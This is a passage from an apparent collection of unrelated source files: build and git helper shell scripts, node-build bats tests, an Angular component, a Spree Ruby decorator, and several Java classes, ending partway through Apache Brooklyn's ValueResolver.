ac2_55_macros="AC_COMPILER_IFELSE AC_FUNC_MBRTOWC AC_HEADER_STDBOOL AC_LANG_CONFTEST AC_LANG_SOURCE AC_LANG_PROGRAM AC_LANG_CALL AC_LANG_FUNC_TRY_LINK AC_MSG_FAILURE AC_PREPROC_IFELSE"
ac2_54_macros="AC_C_BACKSLASH_A AC_CONFIG_LIBOBJ_DIR AC_GNU_SOURCE AC_PROG_EGREP AC_PROG_FGREP AC_REPLACE_FNMATCH AC_FUNC_FNMATCH_GNU AC_FUNC_REALLOC AC_TYPE_MBSTATE_T"
macros_to_search=""
ac_major="`echo ${AUTOCONF_VERSION}. | cut -d. -f1 | sed 's/[^0-9]//g'`"
ac_minor="`echo ${AUTOCONF_VERSION}. | cut -d. -f2 | sed 's/[^0-9]//g'`"
if [ $ac_major -lt 2 ] ; then
macros_to_search="$ac2_59_macros $ac2_55_macros $ac2_54_macros"
else
if [ $ac_minor -lt 54 ] ; then
macros_to_search="$ac2_59_macros $ac2_55_macros $ac2_54_macros"
elif [ $ac_minor -lt 55 ] ; then
macros_to_search="$ac2_59_macros $ac2_55_macros"
elif [ $ac_minor -lt 59 ] ; then
macros_to_search="$ac2_59_macros"
fi
fi
configure_ac_macros=__none__
for feature in $macros_to_search ; do
$VERBOSE_ECHO "Searching for $feature in $CONFIGURE"
found="`grep \"^$feature.*\" $CONFIGURE`"
if [ ! "x$found" = "x" ] ; then
if [ "x$configure_ac_macros" = "x__none__" ] ; then
configure_ac_macros="$feature"
else
configure_ac_macros="$feature $configure_ac_macros"
fi
fi
done
if [ ! "x$configure_ac_macros" = "x__none__" ] ; then
$ECHO
$ECHO "Warning: Unsupported macros were found in $CONFIGURE"
$ECHO
$ECHO "The `echo $CONFIGURE | basename` file was scanned in order to determine if any"
$ECHO "unsupported macros are used that exceed the minimum version"
$ECHO "settings specified within this file. As such, the following macros"
$ECHO "should be removed from configure.ac or the version numbers in this"
$ECHO "file should be increased:"
$ECHO
$ECHO "$configure_ac_macros"
$ECHO
$ECHO $ECHO_N "Ignorantly continuing build preparation ... $ECHO_C"
fi
###################
# autoconf, retry #
###################
$VERBOSE_ECHO
$VERBOSE_ECHO "$AUTOCONF"
autoconf_output="`$AUTOCONF 2>&1`"
ret=$?
$VERBOSE_ECHO "$autoconf_output"
if [ ! $ret = 0 ] ; then
# test if libtool is busted
libtool_failure "$autoconf_output"
# let the user know what went wrong
cat <<EOF
$autoconf_output
EOF
$ECHO "ERROR: $AUTOCONF failed"
exit 2
else
# autoconf sans -f and possibly sans unsupported options succeed so warn verbosely
$ECHO
$ECHO "Warning: autoconf seems to have succeeded by removing the following options:"
$ECHO " AUTOCONF_OPTIONS=\"$AUTOCONF_OPTIONS\""
$ECHO
$ECHO "Removing those options should not be necessary and indicate some other"
$ECHO "problem with the build system. The build preparation is highly suspect"
$ECHO "and may result in configuration or compilation errors. Consider"
if [ "x$VERBOSE_ECHO" = "x:" ] ; then
$ECHO "rerunning the build preparation with verbose output enabled."
$ECHO " $AUTOGEN_SH --verbose"
else
$ECHO "reviewing the minimum GNU Autotools version settings contained in"
$ECHO "this script along with the macros being used in your `echo $CONFIGURE | basename` file."
fi
$ECHO
$ECHO $ECHO_N "Continuing build preparation ... $ECHO_C"
fi # autoconf ret = 0
fi # autoconf ret = 0
##############
# autoheader #
##############
need_autoheader=no
for feature in AM_CONFIG_HEADER AC_CONFIG_HEADER ; do
$VERBOSE_ECHO "Searching for $feature in $CONFIGURE"
found="`grep \"^$feature.*\" $CONFIGURE`"
if [ ! "x$found" = "x" ] ; then
need_autoheader=yes
break
fi
done
if [ "x$need_autoheader" = "xyes" ] ; then
$VERBOSE_ECHO "$AUTOHEADER $AUTOHEADER_OPTIONS"
autoheader_output="`$AUTOHEADER $AUTOHEADER_OPTIONS 2>&1`"
ret=$?
$VERBOSE_ECHO "$autoheader_output"
if [ ! $ret = 0 ] ; then $ECHO "ERROR: $AUTOHEADER failed" && exit 2 ; fi
fi # need_autoheader
############
# automake #
############
need_automake=no
for feature in AM_INIT_AUTOMAKE ; do
$VERBOSE_ECHO "Searching for $feature in $CONFIGURE"
found="`grep \"^$feature.*\" $CONFIGURE`"
if [ ! "x$found" = "x" ] ; then
need_automake=yes
break
fi
done
if [ "x$need_automake" = "xyes" ] ; then
$VERBOSE_ECHO "$AUTOMAKE $AUTOMAKE_OPTIONS"
automake_output="`$AUTOMAKE $AUTOMAKE_OPTIONS 2>&1`"
ret=$?
$VERBOSE_ECHO "$automake_output"
if [ ! $ret = 0 ] ; then
###################
# automake, retry #
###################
$VERBOSE_ECHO
$VERBOSE_ECHO "$AUTOMAKE $ALT_AUTOMAKE_OPTIONS"
# retry without the -f
automake_output="`$AUTOMAKE $ALT_AUTOMAKE_OPTIONS 2>&1`"
ret=$?
$VERBOSE_ECHO "$automake_output"
if [ ! $ret = 0 ] ; then
# test if libtool is busted
libtool_failure "$automake_output"
# let the user know what went wrong
cat <<EOF
$automake_output
EOF
$ECHO "ERROR: $AUTOMAKE failed"
exit 2
fi # automake retry
fi # automake ret = 0
fi # need_automake
} # end of manual_autogen
#####################################
# RECURSIVE_MANUAL_AUTOGEN FUNCTION #
#####################################
recursive_manual_autogen ( ) {
# run the build preparation steps manually for this directory
manual_autogen
# for projects using recursive configure, run the build
# preparation steps for the subdirectories.
if [ ! "x$CONFIG_SUBDIRS" = "x" ] ; then
$VERBOSE_ECHO "Recursively configuring the following directories:"
$VERBOSE_ECHO " $CONFIG_SUBDIRS"
for dir in $CONFIG_SUBDIRS ; do
$VERBOSE_ECHO "Processing recursive configure in $dir"
cd "$START_PATH"
cd "$dir"
# new directory, prepare
initialize
# run manual steps for the subdir and any others below
recursive_manual_autogen
done
fi
}
################################
# run manual preparation steps #
################################
if [ "x$reconfigure_manually" = "xyes" ] ; then
$ECHO
$ECHO $ECHO_N "Preparing build ... $ECHO_C"
recursive_manual_autogen
fi
#########################
# restore and summarize #
#########################
cd "$START_PATH"
# restore COPYING and INSTALL from backup if necessary
recursive_restore
# make sure we end up with a configure script
config_ac="`locate_configure_template`"
config="`echo $config_ac | sed 's/\.ac$//' | sed 's/\.in$//'`"
if [ "x$config" = "x" ] ; then
$VERBOSE_ECHO "Could not locate the configure template (from `pwd`)"
fi
# summarize
$ECHO "done"
$ECHO
if test "x$config" = "x" -o ! -f "$config" ; then
$ECHO "WARNING: The $PROJECT build system should now be prepared but there"
$ECHO "does not seem to be a resulting configure file. This is unexpected"
$ECHO "and likely the result of an error. You should run $NAME_OF_AUTOGEN"
$ECHO "with the --verbose option to get more details on a potential"
$ECHO "misconfiguration."
else
$ECHO "The $PROJECT build system is now prepared. To build here, run:"
$ECHO " $config"
$ECHO " make"
fi
# Local Variables:
# mode: sh
# tab-width: 8
# sh-basic-offset: 4
# sh-indentation: 4
# indent-tabs-mode: t
# End:
# ex: shiftwidth=4 tabstop=8
|
<ul>
<li>apple</li>
<li>banana</li>
<li>orange</li>
</ul> |
#!/usr/bin/env bash
here="$(dirname "$BASH_SOURCE")"
cd $here
#eval "$(docker-machine env default)"
docker run -it --rm --name="ruby_app" -p 7000:7000 my/ruby-app.slim
|
#! /bin/bash
pip3 install -r requirements-tests.txt
python scripts/download_models_and_files.py
|
<reponame>anupsaw/angular2
import { Component } from '@angular/core';
import { NgForm } from '@angular/forms';
import { Router, ActivatedRoute } from '@angular/router';
import { DataService } from '../../global-services/dataService';
import * as _ from 'lodash';
import { DataServerService } from '../../global-services/dataServerService';
@Component({
templateUrl: 'app/RoutingComponents/user/user.tpl.html'
})
export class UserComponent {
//use of templated form
public user: UserModel
private id: number;
constructor(private _route: Router,
private _dataService: DataService,
private _routeData: ActivatedRoute,
private dataService: DataServerService
) {
this.user = new UserModel();
}
ngOnInit() {
this._routeData.params.subscribe((user: UserModel) => {
let id = +user.id;
if (id === 0) {
this.user = new UserModel();
} else {
this.dataService.getData('user', id).subscribe((user: any) => {
if (!_.isEmpty(user)) { this.user = user; }
});
}
})
}
saveAndNext() {
console.log(this.user);
//let res = this._dataService.save('user', this.user);
let res;
this.dataService.postData('user', this.user).subscribe(data => {
if (data.id) this._route.navigate(['/work', data.id]);
});
}
}
export class UserModel {
public firstName: string;
public lastName: string;
public email: string;
public userName: string;
public password: string;
public confirmPassword: string;
public id: number;
} |
<filename>app/decorators/controllers/solidus_dynamic_variants/spree/orders_controller_decorator.rb
# frozen_string_literal: true
module SolidusDynamicVariants
module Spree
module OrdersControllerDecorator
def variant_populate
@order = current_order(create_order_if_necessary: true)
product = ::Spree::Product.find(params[:product_id])
option_values_ids = params[:options].present? ? params[:options].values : []
option_values = ::Spree::OptionValue.where(id: option_values_ids)
variant = product.try_variant option_values
quantity = params[:quantity].to_i
# 2,147,483,647 is crazy. See issue #2695.
if !quantity.between?(1, 2_147_483_647)
@order.errors.add(:base, Spree.t(:please_enter_reasonable_quantity))
end
begin
@line_item = @order.contents.add(variant, quantity)
rescue ActiveRecord::RecordInvalid => e
@order.errors.add(:base, e.record.errors.full_messages.join(", "))
end
respond_with(@order) do |format|
format.html do
if @order.errors.any?
flash[:error] = @order.errors.full_messages.join(", ")
redirect_back_or_default(spree.root_path)
return
else
redirect_to cart_path
end
end
end
end
::Spree::OrdersController.prepend self
end
end
end
|
# preprocess the cskg graph and put preprocessed graph into output dir
marius_preprocess cskg output_dir/
# run marius on the preprocessed input
marius_train examples/training/configs/cskg_gpu.ini info |
#!/bin/sh
#### written by Daisuke Homma
##
## first, create repo from github.com, click '+' menu to create new repository.
## then run below in the project directory.
## git init
## git commit -m 'first commit'
## git remote add origin https://github.com/<user>/<project>.git
## git push -u origin master
## having done, then run this script.
##
DATE=`date '+%Y/%m/%d %H:%M'`
MESSAGE="committed on ${DATE}."
if [ $# -eq 1 ]; then MESSAGE=$1; fi
git pull
git checkout master
git add .
git commit -a -m "${MESSAGE}"
git push origin master
|
import { Context } from '../../../Context';
import { PiNode } from './PiNode';
describe('Pi Node', () => {
test('Should return PI as output', () => {
const ctx: Context = new Context();
const node = new PiNode(ctx);
expect(node.outputPorts.pi.value).toBe(Math.PI);
});
});
|
/**
* ychen.
* Copyright (c).
*/
package cn.edu.fudan.iipl.util;
import cn.edu.fudan.iipl.entity.Article;
import cn.edu.fudan.iipl.form.ArticleForm;
/**
* article่ฝฌๆข็ฑป
* @author racing
* @version $Id: ArticleConvertor.java, v 0.1 Aug 8, 2015 6:49:01 PM racing Exp $
*/
public class ArticleConvertor {
/**
* ArticleForm่ฝฌๆขๆArticle
* @param form
* @return Article
*/
public static Article convertArticleFormToArticle(ArticleForm form) {
Article article = new Article();
article.setTitle(form.getTitle());
article.setMainBody(form.getMainBody());
article.setCategory(form.getCategory());
article.setGmtCreate(form.getGmtCreate());
article.setGmtModify(form.getGmtModify());
article.setAuthor(form.getAuthor());
return article;
}
}
|
from LightPipes import *
GridSize = 30*mm
GridDimension = 5
lambda_ = 500*nm #lambda_ is used because lambda is a Python build-in function.
Field = Begin(GridSize, lambda_, GridDimension)
print("LightPipes version = ", LPversion)
if LPversion < "2.0.0":
print(Field)
else:
print(Field.field)
LPtest()
LPdemo()
|
#!/bin/bash
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
set -e
APT_PACKAGES="cmake-curses-gui cmake-qt-gui build-essential libnuma-dev libmnl-dev libelf-dev libboost-dev libboost-program-options-dev libboost-coroutine-dev libboost-system-dev libboost-chrono-dev libyaml-cpp-dev libpcap-dev"
repo_root=$(git rev-parse --show-toplevel)
apt-get -y install $APT_PACKAGES
#$SHELL ${repo_root}/submodules/spdk/scripts/pkgdep.sh
|
<gh_stars>0
var classarmnn_1_1_base_memory_manager =
[
[ "MemoryAffinity", "classarmnn_1_1_base_memory_manager.xhtml#aaadc6dca70e0b3cc64ae0aba17be0aae", [
[ "Buffer", "classarmnn_1_1_base_memory_manager.xhtml#aaadc6dca70e0b3cc64ae0aba17be0aaea7e62bc342f41c946868f0ea6f0b712d8", null ],
[ "Offset", "classarmnn_1_1_base_memory_manager.xhtml#aaadc6dca70e0b3cc64ae0aba17be0aaeadfd0a82c4bf37b1e90b690a22a20692e", null ]
] ],
[ "BaseMemoryManager", "classarmnn_1_1_base_memory_manager.xhtml#a0e2288f38bd63b43207e265a221792a5", null ],
[ "~BaseMemoryManager", "classarmnn_1_1_base_memory_manager.xhtml#a00a469f202ef1876876cc8a3148bdc36", null ],
[ "BaseMemoryManager", "classarmnn_1_1_base_memory_manager.xhtml#a803e316b06838334bdf3b8febb0791ee", null ],
[ "Acquire", "classarmnn_1_1_base_memory_manager.xhtml#a21dfb49c3ec675ca25a5eb618fe52b07", null ],
[ "CreateArmComputeMemoryManager", "classarmnn_1_1_base_memory_manager.xhtml#a9380bc07faf4483a49d4bef4db7d87f3", null ],
[ "CreateMemoryGroup", "classarmnn_1_1_base_memory_manager.xhtml#a8194156cbc7688e1a2107589237d5db7", null ],
[ "GetInterLayerManager", "classarmnn_1_1_base_memory_manager.xhtml#a3107a84f3ebba890f5056e81a89854b3", null ],
[ "GetInterLayerMemoryGroup", "classarmnn_1_1_base_memory_manager.xhtml#a481f11f45ac6c278d41e97545429e4ad", null ],
[ "GetIntraLayerManager", "classarmnn_1_1_base_memory_manager.xhtml#a59ad43b7336a480674d77d18ab1b022d", null ],
[ "Release", "classarmnn_1_1_base_memory_manager.xhtml#a1a5dddc8911f6189f9ca01394c59faaf", null ],
[ "m_Allocator", "classarmnn_1_1_base_memory_manager.xhtml#a3c2592601336ba9c115dcb714a1eb20f", null ],
[ "m_InterLayerMemoryGroup", "classarmnn_1_1_base_memory_manager.xhtml#a2fb34dc01d4d29d2de9eb6b29a106634", null ],
[ "m_InterLayerMemoryMgr", "classarmnn_1_1_base_memory_manager.xhtml#a078a5c4f5cce47d82cd4b3002bcb827a", null ],
[ "m_IntraLayerMemoryMgr", "classarmnn_1_1_base_memory_manager.xhtml#afcae38d24590739d2f0aa4362b6a58ed", null ]
]; |
#!/bin/sh
# Settings
WORKING_DIR=$(pwd)
BULLET_PROJ_DIR=$WORKING_DIR/bullet/proj
init() {
NUM_THREADS="1"
CLEAN=""
CONFIG="release"
while test $# -gt 0; do
case "$1" in
"-numthreads")
NUM_THREADS="$2"
shift ;;
"-clean")
CLEAN="yes"
;;
"-config")
CONFIG="$2"
shift ;;
esac
shift # Shifts command line arguments var or something whatever
done
}
usage() {
echo "Usage: $0 <num threads>"
exit 1
}
build_bullet() {
if test -n $BULLET_PROJ_DIR; then
cd "$BULLET_PROJ_DIR"
./premake4 gmake
cd gmake
if test -n "$CLEAN"; then
make clean
fi
make -j$NUM_THREADS "config=$CONFIG"
fi
}
build_vphysics() {
cd "$WORKING_DIR/src"
if test -n "$CLEAN"; then
make clean
fi
make -j$NUM_THREADS "CONFIGURATION=$CONFIG"
}
init $*
build_bullet
build_vphysics
cd "$WORKING_DIR"
|
<gh_stars>10-100
package io.opensphere.wps.streaming.impl;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URISyntaxException;
import java.net.URL;
import org.apache.log4j.Logger;
import io.opensphere.core.server.HttpServer;
import io.opensphere.core.server.ResponseValues;
import io.opensphere.core.server.ServerCreator;
import io.opensphere.core.server.ServerProvider;
import io.opensphere.core.server.ServerProviderRegistry;
import io.opensphere.core.server.StreamHandler;
import io.opensphere.core.util.io.CancellableInputStream;
import io.opensphere.core.util.lang.StringUtilities;
import io.opensphere.wps.streaming.Streamer;
import io.opensphere.wps.streaming.SubscriptionContext;
/**
* This class is a runnable class that can be scheduled to retrieve new NRT data
* at a given polling interval.
*/
public class StreamerImpl implements Streamer
{
/**
* Used to log messages.
*/
private static final Logger LOGGER = Logger.getLogger(StreamerImpl.class);
/**
* The default buffer size to use.
*/
protected static final int ourDefaultBufferSize = 1530;
/**
* Contains the url to use to get new streaming data.
*/
private final SubscriptionContext myContext;
/**
* The object to send the results to.
*/
private final StreamHandler myHandler;
/**
* Indicates if this streamer should still keep running.
*/
private boolean myIsRunning = true;
/**
* Used to get the server object.
*/
private final ServerProviderRegistry myRegistry;
/**
* Constructs a new streamer class.
*
* @param context Contains the url to use to get new data.
* @param handler The object to send the results to.
* @param registry Used to get the server to make the polling requests.
*/
public StreamerImpl(SubscriptionContext context, StreamHandler handler, ServerProviderRegistry registry)
{
myContext = context;
myHandler = handler;
myRegistry = registry;
}
@Override
public SubscriptionContext getContext()
{
return myContext;
}
/**
* Gets the handler.
*
* @return The handler.
*/
public StreamHandler getHandler()
{
return myHandler;
}
@Override
public void start() throws IOException
{
myIsRunning = true;
doStreaming();
}
@Override
public void stop()
{
myIsRunning = false;
}
/**
* Streams the data.
*
* @throws IOException If an unrecoverable exception occurs during
* streaming.
*/
@SuppressWarnings("unchecked")
private void doStreaming() throws IOException
{
URL url = myContext.getStreamUrl();
ServerProvider<HttpServer> provider = myRegistry.getProvider(HttpServer.class);
HttpServer server = null;
if (provider instanceof ServerCreator)
{
server = ((ServerCreator<HttpServer>)provider).createServer(url);
int bufferSize = Integer.parseInt(System.getProperty("nrtBufferSize", String.valueOf(ourDefaultBufferSize)));
server.setBufferSize(bufferSize);
}
else
{
server = provider.getServer(url);
}
int failureCount = 0;
while (myIsRunning)
{
ResponseValues response = new ResponseValues();
try
{
@SuppressWarnings("PMD.PrematureDeclaration")
long t0 = System.nanoTime();
long t1;
if (LOGGER.isDebugEnabled())
{
LOGGER.debug("Requesting NRT features from " + url);
}
try (CancellableInputStream stream = server.sendGet(url, response))
{
if (response.getResponseCode() == HttpURLConnection.HTTP_OK)
{
myHandler.newData(myContext.getStreamId(), stream);
t1 = System.nanoTime();
failureCount = 0;
}
else
{
t1 = System.nanoTime();
failureCount++;
LOGGER.error("Server returned " + response.getResponseCode() + " " + response.getResponseMessage()
+ " for url " + url);
if (failureCount >= 5)
{
throw new IOException("Stream was lost for " + url);
}
else
{
try
{
Thread.sleep(myContext.getPollInterval());
}
catch (InterruptedException e1)
{
if (LOGGER.isDebugEnabled())
{
LOGGER.debug(e1.getMessage(), e1);
}
}
}
}
}
if (LOGGER.isDebugEnabled())
{
LOGGER.debug(StringUtilities.formatTimingMessage("NRT features received from " + url + " in ", t1 - t0));
}
}
catch (IOException | URISyntaxException e)
{
failureCount++;
LOGGER.error("Error occurred for " + url + " " + e.getMessage(), e);
if (failureCount >= 5)
{
throw new IOException(e.getMessage(), e);
}
else
{
try
{
Thread.sleep(myContext.getPollInterval());
}
catch (InterruptedException e1)
{
if (LOGGER.isDebugEnabled())
{
LOGGER.debug(e1.getMessage(), e1);
}
}
}
}
}
}
}
|
public class Permutations {
public static void main(String[] args) {
String str = "ABC";
int n = str.length();
Permutations permutation = new Permutations();
permutation.permute(str, 0, n - 1);
}
private void permute(String str, int l, int r)
{
if (l == r)
System.out.println(str);
else
{
for (int i = l; i <= r; i++)
{
str = swap(str, l, i);
permute(str, l + 1, r);
str = swap(str, l, i);
}
}
}
public String swap(String a, int i, int j)
{
char temp;
char[] charArray = a.toCharArray();
temp = charArray[i];
charArray[i] = charArray[j];
charArray[j] = temp;
return String.valueOf(charArray);
}
} |
#!/usr/bin/env bats
load test_helper
export NODE_BUILD_SKIP_MIRROR=1
export NODE_BUILD_CACHE_PATH=
setup() {
export NODE_BUILD_BUILD_PATH="${BATS_TMPDIR}/source"
mkdir -p "${NODE_BUILD_BUILD_PATH}"
}
@test "failed download displays error message" {
stub curl false
install_fixture definitions/without-checksum
assert_failure
assert_output --partial "> http://example.com/packages/package-1.0.0.tar.gz"
assert_output --partial "error: failed to download package-1.0.0.tar.gz"
}
@test "no download tool" {
skip "This test fails on ubuntu-20 for some reason"
export -n NODE_BUILD_HTTP_CLIENT
clean_path="$(remove_commands_from_path curl wget aria2c)"
PATH="$clean_path" install_fixture definitions/without-checksum
assert_failure
assert_output --partial 'error: install `curl`, `wget`, or `aria2c` to download packages'
}
@test "using aria2c if available" {
export NODE_BUILD_ARIA2_OPTS=
export -n NODE_BUILD_HTTP_CLIENT
stub aria2c "--allow-overwrite=true --no-conf=true -o * http://example.com/* : cp $FIXTURE_ROOT/\${5##*/} \$4"
install_fixture definitions/without-checksum
assert_success
assert_output - <<OUT
Downloading package-1.0.0.tar.gz...
-> http://example.com/packages/package-1.0.0.tar.gz
Installing package-1.0.0...
Installed package-1.0.0 to ${BATS_TMPDIR}/install
OUT
unstub aria2c
}
@test "fetching from git repository" {
stub git "clone --depth 1 --branch master http://example.com/packages/package.git package-dev : mkdir package-dev"
run_inline_definition <<DEF
install_git "package-dev" "http://example.com/packages/package.git" master copy
DEF
assert_success
assert_output - <<OUT
Cloning http://example.com/packages/package.git...
Installing package-dev...
Installed package-dev to ${BATS_TMPDIR}/install
OUT
unstub git
}
@test "updating existing git repository" {
mkdir -p "${NODE_BUILD_BUILD_PATH}/package-dev"
stub git \
"fetch --depth 1 origin +master : true" \
"checkout -q -B master origin/master : true"
run_inline_definition <<DEF
install_git "package-dev" "http://example.com/packages/package.git" master copy
DEF
assert_success
assert_output - <<OUT
Cloning http://example.com/packages/package.git...
Installing package-dev...
Installed package-dev to ${BATS_TMPDIR}/install
OUT
unstub git
}
|
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
import { TabStopsRequirementResult } from 'DetailsView/tab-stops-requirement-result';
export class TabStopsFailedCounter {
public getFailedByRequirementId = (
results: TabStopsRequirementResult[],
requirementId: string,
): number => {
return results.reduce((total, result) => {
return result.id === requirementId ? total + result.instances.length : total;
}, 0);
};
public getTotalFailed = (results: TabStopsRequirementResult[]): number => {
return results.reduce((total, result) => {
return total + result.instances.length;
}, 0);
};
}
|
package me.eirinimitsopoulou.bakingapp.Adapaters;
import android.content.Context;
import android.support.v7.widget.CardView;
import android.support.v7.widget.RecyclerView;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.TextView;
import me.eirinimitsopoulou.bakingapp.R;
import me.eirinimitsopoulou.bakingapp.Data.Steps;
import butterknife.BindView;
import butterknife.ButterKnife;
/**
* Created by eirinimitsopoulou on 30/05/2018.
*/
public class StepsAdapter extends RecyclerView.Adapter<StepsAdapter.RecipeStepViewHolder> {
private final Context mContext;
private final Steps[] mStepList;
private OnItemClickListener mListener;
private int mSelectedItemPosition = -1;
public StepsAdapter(Context context, Steps[] stepList) {
mContext = context;
mStepList = stepList;
}
public void setOnStepClickListener(OnItemClickListener listener) {
mListener = listener;
}
@Override
public RecipeStepViewHolder onCreateViewHolder(ViewGroup parent, int viewType) {
View view = LayoutInflater.from(mContext).inflate(R.layout.step_list_item, parent, false);
return new RecipeStepViewHolder(view);
}
@Override
public void onBindViewHolder(RecipeStepViewHolder holder, int position) {
holder.description.setText(mStepList[position].getShortDescription());
}
@Override
public int getItemCount() {
return mStepList.length;
}
public class RecipeStepViewHolder extends RecyclerView.ViewHolder implements View.OnClickListener {
@BindView(R.id.step_list_item)
CardView card;
@BindView(R.id.step_short_description)
TextView description;
public RecipeStepViewHolder(View itemView) {
super(itemView);
ButterKnife.bind(this, itemView);
card.setOnClickListener(this);
}
@Override
public void onClick(View view) {
if (mListener != null) {
mListener.onRecipeStepClicked(getAdapterPosition());
mSelectedItemPosition = getAdapterPosition();
notifyDataSetChanged();
}
}
}
public interface OnItemClickListener {
void onRecipeStepClicked(int position);
}
}
|
def __init__(self, foo, bar, baz, boom=1, bang=2):
attributesFromDict(locals())
|
<filename>src/main/java/de/siphalor/spiceoffabric/client/compat/REIPlugin.java<gh_stars>0
package de.siphalor.spiceoffabric.client.compat;
import de.siphalor.spiceoffabric.SpiceOfFabric;
import me.shedaniel.rei.api.client.plugins.REIClientPlugin;
import me.shedaniel.rei.api.client.registry.entry.EntryRegistry;
import me.shedaniel.rei.api.common.util.EntryStacks;
import net.fabricmc.api.EnvType;
import net.fabricmc.api.Environment;
import net.minecraft.item.ItemStack;
import net.minecraft.item.Items;
import net.minecraft.nbt.NbtCompound;
@Environment(EnvType.CLIENT)
public class REIPlugin implements REIClientPlugin {
@Override
public void registerEntries(EntryRegistry entryRegistry) {
ItemStack itemStack = new ItemStack(Items.WRITTEN_BOOK);
NbtCompound compound = itemStack.getOrCreateNbt();
compound.putString("title", "");
compound.putString("author", "Me");
compound.putBoolean(SpiceOfFabric.FOOD_JOURNAL_FLAG, true);
itemStack.getOrCreateSubNbt("display").putString("Name", "{\"translate\":\"Diet Journal\",\"bold\":true}");
entryRegistry.addEntries(EntryStacks.of(itemStack));
}
}
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package brooklyn.util.task;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.Callable;
import java.util.concurrent.Future;
import java.util.concurrent.atomic.AtomicBoolean;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import brooklyn.management.ExecutionContext;
import brooklyn.management.Task;
import brooklyn.management.TaskAdaptable;
import brooklyn.util.exceptions.Exceptions;
import brooklyn.util.flags.TypeCoercions;
import brooklyn.util.guava.Maybe;
import brooklyn.util.time.CountdownTimer;
import brooklyn.util.time.Duration;
import brooklyn.util.time.Durations;
import com.google.common.collect.Lists;
import com.google.common.collect.Maps;
import com.google.common.collect.Sets;
import com.google.common.reflect.TypeToken;
/**
* Resolves a given object, as follows:
* <li> If it is a {@link Tasks} or a {@link DeferredSupplier} then get its contents
* <li> If it's a map and {@link #deep(boolean)} is requested, it applies resolution to contents
* <li> It applies coercion
* <p>
* Fluent-style API exposes a number of other options.
*/
public class ValueResolver<T> implements DeferredSupplier<T> {
private static final Logger log = LoggerFactory.getLogger(ValueResolver.class);
final Object value;
final Class<T> type;
ExecutionContext exec;
String description;
boolean forceDeep;
/** null means do it if you can; true means always, false means never */
Boolean embedResolutionInTask;
/** timeout on execution, if possible, or if embedResolutionInTask is true */
Duration timeout;
T defaultValue = null;
boolean returnDefaultOnGet = false;
boolean swallowExceptions = false;
// internal fields
final Object parentOriginalValue;
final CountdownTimer parentTimer;
AtomicBoolean started = new AtomicBoolean(false);
boolean expired;
ValueResolver(Object v, Class<T> type) {
this.value = v;
this.type = type;
checkTypeNotNull();
parentOriginalValue = null;
parentTimer = null;
}
ValueResolver(Object v, Class<T> type, ValueResolver<?> parent) {
this.value = v;
this.type = type;
checkTypeNotNull();
exec = parent.exec;
description = parent.description;
forceDeep = parent.forceDeep;
embedResolutionInTask = parent.embedResolutionInTask;
parentOriginalValue = parent.getOriginalValue();
timeout = parent.timeout;
parentTimer = parent.parentTimer;
if (parentTimer!=null && parentTimer.isExpired())
expired = true;
// default value and swallow exceptions do not need to be nested
}
public static class ResolverBuilderPretype {
final Object v;
public ResolverBuilderPretype(Object v) {
this.v = v;
}
public <T> ValueResolver<T> as(Class<T> type) {
return new ValueResolver<T>(v, type);
}
}
/** returns a copy of this resolver which can be queried, even if the original (single-use instance) has already been copied */
public ValueResolver<T> clone() {
ValueResolver<T> result = new ValueResolver<T>(value, type)
.context(exec).description(description)
.embedResolutionInTask(embedResolutionInTask)
.deep(forceDeep)
.timeout(timeout);
if (returnDefaultOnGet) result.defaultValue(defaultValue);
if (swallowExceptions) result.swallowExceptions();
return result;
}
/** execution context to use when resolving; required if resolving unsubmitted tasks or running with a time limit */
public ValueResolver<T> context(ExecutionContext exec) {
this.exec = exec;
return this;
}
/** sets a message which will be displayed in status reports while it waits (e.g. the name of the config key being looked up) */
public ValueResolver<T> description(String description) {
this.description = description;
return this;
}
/** sets a default value which will be returned on a call to {@link #get()} if the task does not complete
* or completes with an error
* <p>
* note that {@link #getMaybe()} returns an absent object even in the presence of
* a default, so that any error can still be accessed */
public ValueResolver<T> defaultValue(T defaultValue) {
this.defaultValue = defaultValue;
this.returnDefaultOnGet = true;
return this;
}
/** indicates that no default value should be returned on a call to {@link #get()}, and instead it should throw
* (this is the default; this method is provided to undo a call to {@link #defaultValue(Object)}) */
public ValueResolver<T> noDefaultValue() {
this.returnDefaultOnGet = false;
this.defaultValue = null;
return this;
}
/** indicates that exceptions in resolution should not be thrown on a call to {@link #getMaybe()},
* but rather used as part of the {@link Maybe#get()} if it's absent,
* and swallowed altogether on a call to {@link #get()} in the presence of a {@link #defaultValue(Object)} */
public ValueResolver<T> swallowExceptions() {
this.swallowExceptions = true;
return this;
}
public Maybe<T> getDefault() {
if (returnDefaultOnGet) return Maybe.of(defaultValue);
else return Maybe.absent("No default value set");
}
/** causes nested structures (maps, lists) to be descended and nested unresolved values resolved */
public ValueResolver<T> deep(boolean forceDeep) {
this.forceDeep = forceDeep;
return this;
}
/** if true, forces execution of a deferred supplier to be run in a task;
* if false, it prevents it (meaning time limits may not be applied);
* if null, the default, it runs in a task if a time limit is applied.
* <p>
* running inside a task is required for some {@link DeferredSupplier}
* instances which look up a task {@link ExecutionContext}. */
public ValueResolver<T> embedResolutionInTask(Boolean embedResolutionInTask) {
this.embedResolutionInTask = embedResolutionInTask;
return this;
}
/** sets a time limit on executions
* <p>
* used for {@link Task} and {@link DeferredSupplier} instances.
* may require an execution context at runtime. */
public ValueResolver<T> timeout(Duration timeout) {
this.timeout = timeout;
return this;
}
protected void checkTypeNotNull() {
if (type==null)
throw new NullPointerException("type must be set to resolve, for '"+value+"'"+(description!=null ? ", "+description : ""));
}
public T get() {
Maybe<T> m = getMaybe();
if (m.isPresent()) return m.get();
if (returnDefaultOnGet) return defaultValue;
return m.get();
